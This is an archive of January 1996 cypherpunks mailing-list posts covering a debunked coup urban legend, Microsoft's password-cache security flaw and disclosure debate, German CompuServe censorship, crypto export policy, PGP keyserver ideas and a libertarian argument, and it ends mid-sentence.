Message-ID: <199601081852.SAA03871@bushing.plastic.crosslink.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> Seen on Alt.best.of.internet. Would love to find out if this is 
> true! 
> 
> Shri
> 
> > >This falls into the "Why did it have to happen on *MY* shift?" category.
> > 
> > >A friend of mine is a chief engineer at SuperMac, and he related this
> > >story to me.
> > 
> > >Some poor SuperMac TechSport got a call from some middle level official...
> > >from the legitimate government of Trinidad.  The fellow spoke very good
> > >English, and fairly calmly described the problem.
> > 
> > >It seemed there was a coup attempt in progress at that moment.  However,
> > >the national armoury for that city was kept in the same building as the
> > >Legislature, and it seems that there was a combination lock on the door
> > >to the armoury.  Of the people in the capitol city that day, only the
> > >Chief of the Capitol Guard and the Chief Armourer knew the combination to
> > >the lock, and they had already been killed.

It's not.  This was hashed over in alt.folklore.computers a little
while back, and someone did some research and found out that there
haven't been any coup attempts in the past few years in Trinidad, or
something like that.

- -- 
Ben Byer    root@bushing.plastic.crosslink.net    I am not a bushing
GCS d-- s: a--- C++ UL++++ P++ L++ E+ W+ N++ o K-- w-- !O M-- !V !PS
!PE Y+(++) PGP t+ 5 !X R tv(+) DI+ G e- h! r !y

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQB1AwUBMPFn4LD5/Q37XXHFAQFTHgL+O4EzDxZVHSOmb2SZ3vbJi64tZyZfvuUk
Stgr4qUJ8xfXahNxgDR3WgbTcvWt8s1nFc0FdWCuQzOnaX8Tz4f8C1R83bS1fUDb
lH8jgEFdsCJ1GGy0yL1lB7JvcFlRYFpM
=zeah
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 9 Jan 1996 08:19:24 +0800
To: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Subject: Re: Scaling Web-of-Trust
In-Reply-To: <30ed7ecd005b002@noc.cis.umn.edu>
Message-ID: <199601090005.TAA17163@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

I believe you are talking about the paper that Jeff Schiller and I
presented at the January '95 USENIX Conference, _Scaling the Web of
Trust_.  You can find this paper (in ASCII or PS) via ftp:
	ftp://toxicwaste.mit.edu/pub/pgpsign/scaleweb.txt
	ftp://toxicwaste.mit.edu/pub/pgpsign/scaleweb.PS

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 1996 11:27:37 +0800
To: cypherpunks@toad.com
Subject: Microsoft continues to mislead public about Windows security bugs (a bit long, with references)
Message-ID: <Pine.ULT.3.91.960108181532.24578C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Please do not dismiss this as mere "Microsoft Bashing." c2.org has
similar promotions running for Netscape, DigiCash, and Java. 

The following is a quote from Microsoft's "Knowledge Base" technical
support and marketing database, which is online in CompuServe and at: 

  http://www.microsoft.com/kb/peropsys/windows/q90271.htm

  Security of the Windows for Workgroups Password Cache
  _____________________________________________________

  The password list file is encrypted with an algorithm that meets the U.S.
  government Data Encryption Standard (DES). This encryption technology is
  the highest security allowed in software exported from the United States.
  The odds of breaking the encryption algorithm are less than those for
  random guesses of what the password might be.

  Even if your logon password is blank, Windows for Workgroups generates
  seemingly random data in your PWL file, so you cannot discover the
  passwords if you look at the PWL file using a file viewer. Currently, no
  user interface exists that allows you to unencrypt passwords in the PWL
  file, so password caching in Windows for Workgroups is as secure as the
  choice of the password used to encrypt your PWL file.

As Microsoft well knows, this is completely untrue. The rest of the world
has known that this is untrue since November 29th. Microsoft quietly
acknowledged on December 7th (after a day of much "Internet Strategy"
hype, and after the deadline for the morning papers) that the exact same
implementation was insecure in Windows 95, and claims to have released a
patch that fixes the problem (the efficacy of the Win95 patch does not
appear to have been verified by anyone outside Microsoft, however). 

Microsoft has not even admitted that this bug in both Windows 95 and
Windows for Workgroups affects Windows for Workgroups, apparently because
they have decided not to fix it. 

Information on the .PWL implementation bugs was first broached on the 
sci.crypt newsgroup in late November 1995, then discussed on the 
cypherpunks list and refined for Community ConneXion's "Hack Microsoft"
promotion, http://www.c2.org/hackmsoft/.

We have since been given a sample trojan horse that will very efficiently
exploit this bug in Windows for Workgroups. Distributed as a Word Basic
virus, MIME attachment, or downloadable archive (note that Exchange and
Internet Explorer unwisely execute downloaded binaries without even a
virus check, a problem that Sun's Java has long acknowledged and
addressed), this trojan horse could collect passwords and other sensitive
information from .PWL files and other sources and send them out via email,
possibly through an untraceable chain of remailers or to a throwaway
trial account on, for example, America "Online." 

We believe that it would be highly irresponsible to release the full
version of this hack, but we will soon release a crippled
demonstration-only version if Microsoft does not at the very least admit
that this problem has always affected Windows for Workgroups, correct
their online documentation, publish the specifications of the Win95
security patch for review by outside security experts, and issue a public
retraction. 

See also:

  http://www.microsoft.com/kb/peropsys/windows/90210.htm
  http://www.microsoft.com/windows/pr/clarifications.htm
  http://www.c2.org/hackmsoft/

  http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

  {mirror of above} http://www.mari.su/guide/win95/
  {mirror of above} ftp://ftp.demon.co.uk/pub/mirrors/win95net/
  {more mirrors are under construction in Australia and elsewhere}

In other news, I assume everyone knows by now that NT's claimed C2
security rating was granted *for use a standalone workstation only*. It
has been widely reported that its NetWare Services implementation does
not ask for passwords for nonexistent usernames, making a potential
cracker's job that much easier. The correct response, which is given by
real NetWare servers and other servers that are certified C2-secure on
networks, is to silently ask for a password in all cases. 

I started getting copies of hackmsoft@c2.org mail on December 20th. It's 
really depressing.

We've also seen problems with Microsoft Access 95's security. Basically,
there is none. Anyone can access the network-enabled Access as any user
without knowing the password. We don't think it would be responsible to
publicly release this hack, either, until Microsoft has had another
chance to patch the hole (they've known about it for some time). 

These are far, far worse than the widely publicized bugs in Netscape's
SSL implementation, which have been fixed. Yet the only place I've seen
them mentioned is the lapdog Seattle Times, which only reports bug
*fixes* in glowing terms. 

Is anybody listening?

- -rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPHZrI3DXUbM57SdAQFojwP/T0CIjfyEz5NHD81wPdkAuUf1YCB8OE3/
4NakffTxzmPxJXRT/MoRpOMn4qJa6mzC6WAgAdwtKWG/3K9WS1LNgM/w/PYMHj45
pEQroJBzoXU/Sctjnyz87FBl2/m6dwAdvPQqGOzGqsLVDaFsmqbWtalkvP2y0707
ntdb2fkqpNI=
=q491
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 9 Jan 1996 09:21:48 +0800
To: cypherpunks@toad.com
Subject: Re: Horowitz "thread"
Message-ID: <199601090108.UAA00896@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 08, 1996 17:41:10, 'Alan Horowitz <alanh@infi.net>' wrote: 
 
> 
>I almost hate to start a thread about something that will inevitably  
>implode into a middle-east-politics flamefest... 
> 
 
Then don't. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shri <skc@huge.net.hk>
Date: Tue, 9 Jan 1996 01:51:10 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Re: ABOI: Desperate User Support]
Message-ID: <30F17C73.4765@huge.net.hk>
MIME-Version: 1.0
Content-Type: text/plain


Seen on Alt.best.of.internet. Would love to find out if this is 
true! 

Shri

> >     Origination: alt.sysadmin.recovery
> >      Originator: jerry@worf.tcs.com (Jerry Carlin)
> >Original Subject: support call - urban legand or fact?
> >            Date: 27 Jul 1995 16:44:18 -0700
> >... (many forwards deleted)...
> 
> >This falls into the "Why did it have to happen on *MY* shift?" category.
> 
> >A friend of mine is a chief engineer at SuperMac, and he related this
> >story to me.
> 
> >SuperMac records a certain number of technical support calls at random,
> >to keep tabs on customer satisfaction.  By wild "luck", they managed to
> >catch the following conversation on tape.
> 
> >Some poor SuperMac TechSport got a call from some middle level official...
> >from the legitimate government of Trinidad.  The fellow spoke very good
> >English, and fairly calmly described the problem.
> 
> >It seemed there was a coup attempt in progress at that moment.  However,
> >the national armoury for that city was kept in the same building as the
> >Legislature, and it seems that there was a combination lock on the door
> >to the armoury.  Of the people in the capitol city that day, only the
> >Chief of the Capitol Guard and the Chief Armourer knew the combination to
> >the lock, and they had already been killed.
> 
> >So, this officer of the government of Trinidad continued, the problem is
> >this.  The combination to the lock is stored in a file on the Macintosh,
> >but the file has been encrypted with the SuperMac product called Sentinel.
> >Was there any chance, he asked, that there was a "back door" to the
> >application, so they could get the combination, open the armoury door,
> >and defend the Capitol Building and the legitimately elected government
> >of Trinidad against the insurgents?
> 
> >All the while he is asking this in a very calm voice, there is the sound
> >of gunfire in the background. The Technical Support guy put the person on
> >hold. A phone call to the phone company verified that the origin of the
> >call was in fact Trinidad.  Meanwhile, there was this mad scramble to see
> >if anybody knew of any "back doors" in the Sentinel program.
> 
> >As it turned out, Sentinel uses DES to encrypt the files, and there was
> >no known back door.  The Tech Support fellow told the customer that aside
> >from trying to guess the password, there was no way through Sentinel, and
> >that they'd be better off trying to physically destroy the lock.
> 
> >The official was very polite, thanked him for the effort, and hung up.
> >That night, the legitimate government of Trinidad fell.  One of the BBC
> >reporters mentioned that the casualties seemed heaviest in the capitol,
> >where for some reason, there seemed to be little return fire from the
> >government forces.
> 
> >O.K., so they shouldn't have kept the combination in so precarious a
> >fashion. But it does place, "I can't see my Microsoft Mail server"
> >complaints in a different sort of perspective, does it not?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 9 Jan 1996 15:16:56 +0800
To: cypherpunks@toad.com
Subject: CAL_bak
Message-ID: <199601090214.VAA08347@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Jan 6 Emist reports on the $488m callback game:

      Callback services exploit the fact that in many
      countries it costs more to make one international
      telephone call than to make two from America. By the end
      of the year more than 100 American companies will be
      selling the service.  Places that have tried to stop the
      services include Saudi Arabia, Argentina, South Korea,
      China, Malaysia and Canada's North West Territories,
      where even local calls were cheaper by callback.

      The operators believe they are beyond the reach of local
      laws. Even if laws are passed, technology makes them
      hard to police. "It's a cat and mouse game," one says.
      "It's kind of fun."

   CAL_bak



   Thx to AS.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 10 Jan 1996 07:50:31 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption sales ban costs U.S. $60 billion
Message-ID: <199601090516.VAA28411@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:40 PM 1/7/96 -0800, dang@netcom.com (DRG) wrote:
>S.F. Examiner:
>
>ENCRYPTION SALES BAN COSTS U.S. $60 BILLION
>
>NEW YORK U.S. companies will lose as much as 30 percent of the $200 
>billion in U.S. computer system sales expected in 200 because of federal 
>export laws that limit the encryption of information, a recent study found.

OK, so crypto export laws will cost about as much as direct expenditures
on the War On Politically Incorrect Drugs, or medical costs of tobacco.
No problem....


        :-(


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 9 Jan 1996 14:29:14 +0800
To: cypherpunks@toad.com
Subject: URLs -- Urban Regurgitated Legends
Message-ID: <ad17293b1802100451b7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:50 PM 1/8/96, Futplex wrote:

>Please don't post 6-month-old urban net.urban.legends to cypherpunks.
>(Do we really need to put that in the Junior Grade Cypherpunks Training
>Manual?)

Have you heard that flashing your headlights is a gang signal and can get
you killed? Or about the LSD-soaked samples the kiddies are getting?

Do you know that the word "gullible" is not in any major dictionary?


--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 9 Jan 1996 16:18:44 +0800
To: cypherpunks@toad.com
Subject: S.652 (H.R. 1555)
Message-ID: <199601090608.WAA25533@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Today's version of the bill is posted at:

    http://www.cdt.org/policy/freespeech/12_21.cda.html

    This title may be cited as the "Communications Decency Act of 1995".

    Perhaps some of our more lawyerly types can decipher whether
    it is getting better or worse as the conference committee chews.
    Not I.



    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Tue, 9 Jan 1996 19:32:14 +0800
To: cypherpunks@toad.com
Subject: <fwd> Spiegel on CIS Censorship
Message-ID: <v02130501ad178762d7bd@[198.115.178.224]>
MIME-Version: 1.0
Content-Type: text/plain


        Interesting, below, how CMU's lack of standards, Marty Rim's
exploitive "scholarship," Time Magazine's  sensationalistic schlock
journalism (shades of "National Inquirer" there! remember!) and CIS's utter
ignorance of free-speech principles set the stage for the symbolic
Bravarian Censorship of the Net.  You'll hear of a dozen other nations
jumping in, with different standards, within the month.

        I find the tragic association of a "free" Internet and porn to be
painfully common among cyberless adults even in my own community.  Odds
are, my state, Massachusetts -- arguably the most liberal of the US states
-- would vote for Censorship Filter tomorrow if it were on a ballot.

        It's amazing how incompetent the liberal/libertarian side has been
in this public debate. (So incompetent, in fact, that there has been _no_
public debate!)  Everyone who wants to place control over any filter (any
part of The Filter?) in the hands of the citizen is just another
snuff/torture/kiddy porn addict.  <sigh.>  How have we let the image of the
Net -- surely one of the most generous, selfless, sharing communities ever
to come into existance (think of the freeware!) -- be reduced to such
degradation.

        _Vin


---------- Forwarded message begins here ----------

From--michael_kunze@spiegel.de (Michael Kunze)
Newsgroups--alt.censorship
Subject--CIS censorship--The whole story
Date--Sat, 06 Jan 1996 09:33:39 GMT

Dear Nettizens,

Some few fivehundred postings ago, I promised you let you have more
details about the CompuServe censorship case investigated by the
editorial staff of SPIEGEL online. It is not a story of evil but of
people acting overambitious and ignorant. And it is not quite as
simple as DrG might be wishing!

To keep it short, here are the facts:

In 1994, a Task Force called "AG EDV" was set up by the Bavarian
Minister of Interior at the Police Headquarters in Munich. Initially,
the Task Force was formed to search persons dealing with pornographic
material via BTX the former online service of German Telekom and its
work was limited to one year.

For the moment, investigations of this Task Force ran successfully due
to the assistance of Telekom. But simultaneously, people being
suspected changed their ways of distributing  either to closed BBS
systems or chose more secret methods. So the Task Force was compelled
to enhance their efforts and they raided Munich BBS systems.
Furthermore, they studied computer magazines to find ads for
pornographic CD-ROMs. During this operation they found what they were
looking for, and "PC Direkt", a Ziff Davis publication, and some other
magazine were forced to pulp some issues.

All activities of the Task Force could not have happened, if they were
not supported by a whole bunch of local prosecutors and judges.
Sticking together, chatting, doing favours forms a part of the social
life in Munich - in malicious words - the 'Munich swamp'.

The prevailing opinion of the Task Force and of some prosecutors is
that carriers of digital information could held responsible for the
content of what they are spreading. This meaning matches exactly the
content of the CDA. But this is only one point of view. Up to now,
there doesn't exist any law or direction in Germany concerning
responsibilities of ISPs or online services regarding contents they
only do deliver. And so, judges decide from case to case. The German
department of justice thinks that carriers could be held responsible
if they deliver illegal content "deliberately". But then, could one
call them "carriers"?

Last summer, a kind of hysteria about Internet pornography broke out
in German media. A few journalist had made their first steps in the
Internet and discovered nasty postings in the
alt.binaries.pictures.erotica Usenet hierarchy. A student of Erlangen
University was seized because of spreading child porn via Usenet.
Then, the "Time" article about Internet porn was published and quoted
by nearly every German newspaper.

I think at that time the Task Force planned to investigate the Usenet.
Due to the facts that CIS had become a big ISP and their German office
is located in Munich, CIS seemed to be a worthwhile target. Somehow
the Task Force managed to get a search warrant to investigate the
Munich CIS office on November, 22nd.  However, the search was more or
less like a visit. Let me quote the public prosecutor: CompuServe "was
quite cooperative". "We sat together talking about chances to kick
pornographic contents out of CompuServe's information system." The
police officers just collected a copy of the CompuServe association
contract and the address of the CEO.

Two days later, CompuServe's German managers published that they "will
do anything to support the work of German authorities fighting against
pornography in Cyberspace". On December, 8th, CIS was handled a list
of more than 200 newsgroups by the Task Force. In my opinion,
interpreting the prosecutor and the CIS spokeswoman, this list was
presented to CIS as containing "suspicious newsgroups". In the
attached letter from the prosecutor it is said: "... it is left to
CompuServe to take the necessary steps to avoid possible liabilities
to punishment."

So, if CompuServe should have ever had threats, it could have been
only very small ones. But there is no reason to their German
management to risk anything. CompuServe's approach is not to guarantee
for "freedom of speech and information" but  to make "money".

When i interviewed the prosecutor, it soon became quite clear that his
department had tried to bring CIS to court to get its legal position
checked by some judges. Because of CIS servile tactics they had to
give up their goal.

The ominous list itself shows, how ignorant the members of the Task
Force are about the Usenet. In my opinion, they just sampled all
newsgroups containing words like "sex", "erotic", "gay" and so on and
put the result onto the list.

We have two in depth articles on the whole affair on our web server.
One is an extended version of what i've posted here, the other deals
with the CDA and the actual political and legal situation concerning
the Internet. Unfortunately for US readers, these articles are in
German because we didn't found the time to translate them. But i hope
will can manage this until Monday 8th, 8:00 AM, EST. Then, you should
point your browser to

<http://hamburg.bda.de:800/bda/int/spon/online/excl03.html>

or have a look at our complete online services at

<http://www.spiegel.de>

By the way, SPIEGEL online is the online department of the reputable
German news magazin DER SPIEGEL.


Greetings
Michael
--------------------------------------------------------------
Michael Kunze                          Tel.:+49(0)40-3007-0
Redaktion/editorial staff              Fax :+49(0)40-3007-2986
Spiegel Online
Brandstwiete 19
20457 Hamburg / Germany
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
std. disclaimer: diese Meinung meins, exclusiv und immerdar

<*><*>< Vin McLellan + The Privacy Guild + vin@shore.net ><*><**>

Heed, fellow citizens, Justice Felix Frankfurter (Butler v. Michigan):

       "The State insists that, by thus quarantining the general reading public
against books not too rugged for grown men and women in order to shield
juvenile innocence, it is exercising its power to promote the general
welfare. Surely this is to burn the house to roast the pig.... The incidence
of this enactment is to reduce the adult population of Michigan to reading
only what is fit for children."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 8 Jan 1996 19:34:43 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: A couple of ideas for PGP-based programs
In-Reply-To: <2.2.32.19960106103250.00947438@mail.teleport.com>
Message-ID: <199601081126.WAA24401@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Alan Olsen <alano@teleport.com>
 
...
> 1) Something I would like to see on the keyservers for PGP is a way of 
> retreving all of the key revokations since x date without having to get all of
...

Probably a good idea (that, and/or have a mailing list with key revocations).
How about it, keys.pgp.net people?

> 2)  I would like to see a program like private Idaho have the ability to send
> mail to the key server and grab all of the "unknown signator" keys.
...

This is very easy, at least in Unix: pgp -kvv, grep, cut, for.

In DOS, you can do pgp -kvv and find, then edlin to change
every "sig" into "call getkey", call the resulting (batch) file,
which will call GETKEY.BAT for every missing key. I hope.

However, I don't see much of a point to it: these are people you don't
even know the keys of; how are you going to know whether they are
trustworthy? (The Web-o-Trust can only tell you who they are, not
whether to trust them.)

...
> This would
> have the interesting effect of building a more complete keyring, while using 
> the "web of trust" to weed out alot of the bogus keys that tend to crop up on
> the key servers.  After n number of itenerations you would have more of the
> "important keys" and the ones that have little or no signage would be left to
...

No, you wouldn't. You would tend to have the keys that sign a lot
of other keys, which would include both SLED (Four-11) and a lot
of careless people that sign every key in sight.

How about, instead:

3) A way to retrieve all the keys signed by a given entity.

This would have the effect that when you come to trust Alice, you
can simply go and get all the keys she signed. I believe the present
keyservers don't allow that... (Or else I don't know how to ask for it.)


Hope that makes sense...

Adiau - Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMPD/cSxV6mvvBgf5AQEAoQP+MB78qOcXqqXp8XKh8y/UCD7QW1SDN9WX
XMEYQqQijHE1JCwYBlvhtRdqunPJODGBOhN+EVNG8OBrSzQZGkWeRxa+ThhQ+E4L
dwB5WYRzjzDWTNxA1UW1W994Z+FzCUE0OouOiOLOCrstnlnJ6rEY0+NCzieQkx0L
Bf5pVdsEUJg=
=dkEp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 9 Jan 1996 14:30:56 +0800
To: Evan Ravitz <evan@darkstar.cygnus.com>
Subject: Re: DNow2 Re: Hammill 1987 speech
In-Reply-To: <Pine.SUN.3.91.960108013408.6640R-100000@darkstar.cygnus.com>
Message-ID: <Pine.SV4.3.91.960108224625.5588C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi Evan,

Thanks for that lovely peice about the Chiapas uprising. I'm saving it to 
disk. It's so archtypal of the turgid prose of graduates of Moscow's 
Patrice Lumumba University. How wondrous that leftists-without-a-home can 
find a cause to latch onto and keep their rhetorical skills in practice.

Want to come with me tomorrow? I'm going down to the library to re-read
the history of the Indians of Meso-America.  I like the part about the
hundreds of thousands of peasants who had their hearts cut out without
anesthesia, so that the Emperor could collect lots of taxes on an abundant
harvest.  Damn shame that the Spaniards came along and destroyed a
culture, ya know? 


Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Jan 1996 05:52:32 +0800
To: cypherpunks@toad.com
Subject: Re: The LOGIC of Navigator 2.0 ?
Message-ID: <2.2.32.19960109074348.0095ce48@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:12 PM 1/8/96 -0500, you wrote:

>    The [new] browser can use programs that are stored on cen- 
>    tral computers on the Internet, making a personal computer's 
>    operating system less important. 
> 
> 
>  And thereby making GOVERNMENT LOGIC more important? 

I think they are refering to Java scripting in this article.  (You have to
remember that such articles are phrased for those who have little or no
technical knowledge.)

I find it amazing though that they claim a two week release date when I have
not heard of a Java version for the Mac as of yet.  I would think that they
would have put it through at least one beta first.  (But then again, this is
netscape we are talking about...)

[Note to Jeff and other Netscape employees: I realize you have gotten
better.  Lets hope it stays that way. (And I won't make *any* comments about
"tech support".]

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 9 Jan 1996 16:48:37 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Microsoft continues to mislead public about Windows	  security bugs (a bitlong, with references)
Message-ID: <v02120d2dad17d87fa2cc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 1/8/96, James A. Donald wrote:
>At 07:15 PM 1/8/96 -0800, Rich Graves wrote:
>>As Microsoft well knows, this is completely untrue. [...]
>>
>> [...]
>>
>>Microsoft has not even admitted that this bug in both Windows 95 and
>>Windows for Workgroups affects Windows for Workgroups, apparently because
>>they have decided not to fix it.
>>
>> [...]
>>
>> We believe that it would be highly irresponsible to release the full
>> version of this hack, but we will soon release a crippled
>> demonstration-only version
>>
>> Is anybody listening?
>
>They will listen if you start to release full uncrippled exploits, after
>a reasonable delay.

Very true. But why does it always seem to take an exploitable crack before
companies pay attention to security flaws? Is it because they are unable to
admit that they have made a mistake? Everybody makes mistakes. What's the
big deal? I really don't understand it. Any psychologists on this list?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 9 Jan 1996 07:59:32 +0800
To: cypherpunks@toad.com
Subject: Re: phone calls from hell
Message-ID: <199601082348.AAA09773@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


8 Jan 1996
     
Jerusalem, (Reuter) - The head of Israel's Shin Bet
resigned Monday just three days after the killing of a
wanted Palestinian bombmaker recovered some of the damage
the secret service suffered from the assassination of
Yitzhak Rabin.

The man, identified by his initial "kaf," remains in
office until a successor is appointed, Israel Radio said.
His predecessor, Yaacov Peri, is now president of one of
Israel's two cellular telephone networks.  

--

8 Jan 1996
     
Jerusalem (AP) -- The booby-trapped cellular phone that
killed an Islamic militant was delivered by a longtime
informer for Israel who was paid $1 million for helping,
media reports said Monday. 

A fugitive for three years, Ayyash was hiding in the home
of Osama Hamad, his friend from college days.  Hamad said
he warned Ayyash in the summer that his uncle, Kamal
Hamad, may be an informer for Israel.  

Hamad said his uncle gave him a cellular phone so he
could be found easily.  

A day before Ayyash was killed, his uncle asked for the 
cellular phone, took it and returned it later, requesting
that it be kept on at all times, Hamad said.  

Israel's security services apparently deceived Kamal
Hamad, telling him they had planted a bug in the phone,
rather than explosives, the radio said.  

Media reports said that the explosion was set off by
remote control when Ayyash answered a call to him. It is
not known how the identity of Ayyash was ascertained.

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 9 Jan 1996 17:46:11 +0800
To: dnowch2@teleport.com
Subject: Re: NWLibs Re: Hammill 1987 speech
Message-ID: <m0tZaAi-0008xgC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 PM 1/7/96 -0800, you wrote:
>Mr. Bell: 
>
>if I were to summarize my arguments, they would be that governments
>are the way that they are not so much because they attract certain
>dysfunctional individuals, but rather because they are microcosms
>and macrocosms of human psychology. the problems with government
>that libertarians rant about are problems with human behavior.
>the solution is not to get rid of governments-- this is confusing
>cause and effect, symptom and cause. the solution is to work on
>human behavior. when humans begin to think in a different,
>positive way, their governing systems will automatically reflect the change.

Gobbledygook.  Blaming the problems of the system on the people involved.
It is obvious that you are unwilling to admit that THE SYSTEM could, indeed,
BE the problem.


>my essay was designed to show the negative aspects of governments
>that rabid libertarians are always endlessly ranting about are actually
>embodied in the psychologies of those libertarians themselves. 

More gobbledygook.  Blaming the problem on the observers of the problem.


>therefore,
>while I agree with the libertarian that there are many problems with
>governments, I see no reason to believe that libertarians are proposing
>a workable alternative, based on their own stark biases and prejudices.

Still more gobbledygook.  You don't mention  WHICH "stark biases and
prejudices," for instance.


>in fact it seems quite obvious to me that their own "alternatives" are
>either "vaporware" 

"Vaporware" is generally thought of as programs that have not yet been
implemented.  While it is true that much of what libertarians have proposed
has not yet been implemented, blame for this lies strongly (and primarily)
with NON-libertarians.

>or would be far worse in practice than even the
>dysfunctional systems we have in place today.


You haven't established this, and haven't even attempted to.  Your
argumentation is weak and practically meaningless.


>rabid libertarianism reminds me of Marxism: sounds great in theory,

Lots of things "sound great in theory".   That does not mean that everything
that "sounds great in theory" will NOT be good in practice, if allowed to
operate.  This is ESPECIALLY true that much of libertarianism which "sounds
great in theory" actually sounds PERFECTLY AWFUL to the statists who
currently control things.

> and
>you might even convince large parts of the population or key people in
>power to follow it. but does it truly present an implementable and workable
>alternative? 

First, you tell us:  What are your standards for  this?  Are you never going
to admit that it's "workable" until it's actually working?  In other words,
when those opposing it have finally FAILED?

where are the specifics?

"Specific" what?


>identifying problems with government is quite trivial.

If you admit this is the case, this puts even more blame on those defending
government's flaws (or failure to fix them.)

 >this is destructive
>criticism, 

Please document this silly claim.  You're saying identify problems with
government is "destructive"?  "Destructive" of what, pray tell?!?    If it's
"destructive" of a bad and corrcupt government, I'm HAPPY to hear it.   This
kind of "destructive" we need PLENTY more of!


?analogous to the guerilla warfare of words that rabid libertarians
>love. but criticism is easy compared to construction of something that works.

Oddly, the non-libertarians don't usually want to give libertarians the
opportunity to take enough control to show that what they can do "works."
Gee, I wonder why!  Maybe they're afraid of incipient success.
Privatization of previously publicly-provided services is strongly resisted.


>when you focus your attempts on creating a system that embodies your
>ideals instead of ranting at those that do not (and complaining that
>you cannot because governments prevent you), you will make far more
>progress in developing your ideas and convincing the world to follow you
>than any number of essays can accomplish.

More gobbledygook.  

>if libertarianism is truly workable, shouldn't it be workable on
>small scales? 

It is, and does, work on small scales, WHEN ALLOWED.

>what prevents individuals from actually starting it going
>at a small scale and growing it? 

It's called, "government regulation," "taxes," and such.  If you've been
following the news recently, perhaps you've noticed that there are "peanut
quotas" (to cite just one example) which legally prevent me from deciding to
grow peanuts and sell them freely on the American market.  ___THIS___ is
just one of those things which "prevents individuals from actually starting
it going at a small scale and growing it."

Feeling a bit more foolish, Mr. Nuri?!?

>that is the path that every government
>and nation has taken since the beginning of time, why do you think you
>should be exmempt?

That's EXACTLY why libertarianism ISN'T being allowed to flourish.  It
